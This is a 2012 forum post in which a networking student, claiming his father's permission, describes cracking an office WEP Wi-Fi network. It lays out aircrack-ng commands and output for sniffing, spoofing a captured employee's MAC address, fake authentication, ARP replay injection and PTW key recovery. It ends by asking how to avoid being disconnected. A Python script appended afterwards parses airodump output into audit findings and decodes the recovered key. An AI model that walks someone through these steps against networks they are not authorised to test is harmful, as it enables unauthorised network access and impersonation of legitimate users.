[SOLVED: Check the bottom]
Hello all,
I'm a first year "Networking & Administration" student. My father has kindly allowed me to try and crack the encryption on the smaller non-significant kitchen WiFi network in his company office. I wasn't told what the password is but we bet that if I was able to crack it my pops would pay my next semester. I realize that similar introductions are not really relevant to the problem, but I just wanted to highlight the fact that I'm not doing anything illegal.
Straight to the problem. Since the network is WEP-encrypted, I'm running the most common pattern:
airodump-ng -c 9 --bssid 00:1c:f0:83:c4:f0 -w petrovi_wep -i wlan0

With this I was able to capture the MAC of someone in the office who was probably using the net in his lunch break - cc:55:ad:29:37:98
Then:

macchanger -m cc:55:ad:29:37:98 wlan0

Then:

bt ~ # aireplay-ng -e "Petrovi" -1 0 -a 00:1c:f0:83:c4:f0 -h cc:55:ad:29:37:98 wlan0
07:51:29 Waiting for beacon frame (BSSID: 00:1C:F0:83:C4:F0) on channel 9
07:51:29 Sending Authentication Request (Open System) [ACK]
07:51:29 Authentication successful
07:51:29 Sending Association Request [ACK]
07:51:30 Association denied (code 17)
07:51:33 Sending Authentication Request (Open System)
07:51:35 Sending Authentication Request (Open System) [ACK]
07:51:35 Authentication successful
07:51:35 Sending Association Request [ACK]
07:51:35 Association successful :-) (AID: 1)
Then:

 CH  9 ][ Elapsed: 56 s ][ 2012-11-11 07:52

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1C:F0:83:C4:F0   46  82      437       11    0   9  54.  WEP  WEP    OPN  Petrovi

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

I intentionally highlighted the AUTH parameter since it returns OPN most of the time, but every now and then it comes as SKA, which frankly puzzles me. Is it SKA or OPN? I don't know. This is not the airodump screen from the actual cracking operation, as you can see #Data is 0; I just pasted it so it can be seen that AUTH does return either an OPN or SKA result once "Association is successful".
Then:

aireplay-ng -3 -e "Petrovi" -b 00:1c:f0:83:c4:f0 -h cc:55:ad:29:37:98 wlan0

And that's about what I do. This way I'm able to capture between 250k and 1.5m IVs. Once I'm done sniffing:

bt ~ # aircrack-ng petrovi_wep-02.ivs
Opening petrovi_wep-02.ivs
Read 219491 packets.

   #  BSSID              ESSID    Encryption

   1  00:1C:F0:83:C4:F0  Petrovi  WEP (219490 IVs)

Choosing first network as target.

Opening petrovi_wep-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 219490 ivs.
KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )
Decrypted correctly: 100%

I also tried live cracking while maintaining airodump-ng with these parameters:

aircrack-ng -a 1 -0 -n 128 petrovi_wep-02.ivs

Result again was:

Opening petrovi_wep-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 219490 ivs.
KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )
Decrypted correctly: 100%

At this point you're probably thinking that there's no problem at all. Well let me tell you this. I've tried connecting with this password a gazillion times using all kinds of options:
- OPEN wep with 71:77:65:72:74, SKA wep 71:77:65:72:74 Hex
- OPEN wep with "qwert" with ASCII checked, SKA wep with "qwert" with ASCII checked
- OPEN wep with "qwert" with ASCII unchecked, SKA wep with "qwert" with ASCII unchecked
- OPEN wep with 71:77:65:72:74 with ASCII checked, SKA wep with 71:77:65:72:74 with ASCII checked
None of these worked. PWR is good, between 40 and 70. However I can't connect using this password. The funny thing is that the first time when I tried this I captured the MAC of another client and also about 1.5 million IVs. Ran it through PTW - same password, again 100% decrypted correctly. I deleted the first .ivs file because I thought it was bogus.
I tried decrypting with "-K" as well, however it ran for 10 straight hours after which I thought to myself that even if it returns a password successfully, waiting for 10 hours is not a viable option for a professional pentester, so the result is useless even if the pass is correct.
System:
OS: Backtrack 3 HDD installation (KDE)
Machine: DELL Latitude CPi D300XT
Adapter: ALFA awus036h
I already googled this and I found a couple of guys who claim their aircrack-ng also returns non-functional passwords. However all of them receive a working one in a following run and their problem is fixed. I decrypt the same password over and over again and I can't connect at all.
I tried connecting with:
- iwconfig
- some KDE GUI called K Wireless Lan Manager
I have no idea what I am doing wrong. Thanks in advance to all the people who decided to join in and help.
[SOLVED]:
Ok this was a rather stupid mistake from my side. Apparently the AP was somewhat slower to accept connections. I had to increase timeout to 30s and I was able to connect.
Question: I was able to connect and opened Google successfully. However the AP kicks me off 30-60s (sometimes longer) after I connect. I'm using a fake MAC but I still get kicked. Any idea how to resolve this?
Last edited by Onikage; 11-11-2012 at 06:40 AM. Reason: [SOLVED]
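As an added example at the end of this thread (not the poster's code and not part of aircrack-ng), here is the small Python script an auditor reviewing output like the above would write: it parses airodump-ng AP rows and reports every WEP or open network as a finding regardless of what the AUTH column says (OPN and SKA only describe the authentication exchange seen so far; the data encryption is WEP either way, which is why the column flipping between the two changes nothing about the finding), and it decodes an aircrack-ng "KEY FOUND!" line to show that 71:77:65:72:74 and "qwert" are one and the same 5-byte key, i.e. the 40-bit variant that client GUIs usually label "64-bit WEP" (a 13-byte key would be the 104/"128-bit" variant). The first table row is the one from the post; the two other rows, the function names and the regexes are my own constructed sample data and assumptions.

```python
import re

# Constructed sample data modelled on the airodump-ng table in the post. The
# first row is the row shown in the post; the other two are made up here to
# exercise the parser on a WPA2 row and an open network (blank CIPHER/AUTH).
AIRODUMP_ROWS = """\
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:1C:F0:83:C4:F0   46  82      437       11    0   9  54.  WEP  WEP    OPN  Petrovi
AA:BB:CC:DD:EE:01   55  90      120      300    2   6  54e  WPA2 CCMP   PSK  Lab-Constructed
AA:BB:CC:DD:EE:02   30  70       40        0    0   1  54   OPN              Guest-Constructed
"""

# The "KEY FOUND!" line exactly as aircrack-ng printed it in the post.
AIRCRACK_LINE = "KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )"

# One airodump-ng AP row: fixed numeric columns, then ENC and a free-form tail
# (CIPHER AUTH ESSID for protected networks, just ESSID for open ones).
_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<pwr>-?\d+)\s+(?P<rxq>-?\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+"
    r"(?P<ps>\d+)\s+(?P<ch>-?\d+)\s+(?P<mb>\S+)\s+(?P<enc>\S+)\s*(?P<rest>.*)$"
)


def parse_airodump(text):
    """Return one dict per AP row; header lines and station rows are skipped."""
    networks = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m:
            continue
        enc, rest = m.group("enc"), m.group("rest").strip()
        cipher = auth = ""
        if enc == "OPN":
            essid = rest                       # open networks have no CIPHER/AUTH
        else:
            parts = rest.split(None, 2)
            if len(parts) == 3:
                cipher, auth, essid = parts
            elif len(parts) == 2:              # AUTH not observed yet: blank column
                cipher, essid = parts
            else:
                essid = rest
        networks.append({
            "bssid": m.group("bssid"), "channel": int(m.group("ch")),
            "enc": enc, "cipher": cipher, "auth": auth, "essid": essid,
        })
    return networks


def audit(networks):
    """Findings an auditor would report from the table, one string per weak network."""
    findings = []
    for n in networks:
        if n["enc"] == "WEP":
            # OPN vs SKA only describes the authentication exchange seen so far;
            # the data encryption is WEP either way, so the finding is the same.
            findings.append(f"{n['essid']} ({n['bssid']}): WEP in use "
                            f"(auth={n['auth'] or 'unknown'}); migrate to WPA2/WPA3")
        elif n["enc"] == "OPN":
            findings.append(f"{n['essid']} ({n['bssid']}): open network, no encryption")
    return findings


_KEY = re.compile(r"KEY FOUND!\s*\[\s*((?:[0-9A-Fa-f]{2}:)*[0-9A-Fa-f]{2})\s*\]")


def parse_wep_key(line):
    """Decode the hex key from a 'KEY FOUND!' line and name the WEP key size."""
    m = _KEY.search(line)
    if not m:
        raise ValueError("no KEY FOUND! line")
    key = bytes(int(h, 16) for h in m.group(1).split(":"))
    variants = {5: "WEP-40 (64-bit)", 13: "WEP-104 (128-bit)"}
    return {
        "hex": m.group(1),
        "key": key,
        "bits": len(key) * 8,
        "variant": variants.get(len(key), f"non-standard ({len(key)} bytes)"),
        # Only give the ASCII form when every byte is printable; a random hex
        # key usually is not, which is why clients offer a separate hex entry mode.
        "ascii": key.decode("ascii") if all(32 <= b < 127 for b in key) else None,
    }


if __name__ == "__main__":
    for finding in audit(parse_airodump(AIRODUMP_ROWS)):
        print(finding)
    print(parse_wep_key(AIRCRACK_LINE))
```

Run it as-is and it prints two findings (the WEP network from the post and the constructed open one; the WPA2 row is not reported) plus the decoded key: 40 bits, WEP-40, ASCII "qwert". The variant string is the thing to check against whatever the client GUI offers: a "128-bit" WEP profile expects 13 bytes / 26 hex digits and cannot accept this key in either form.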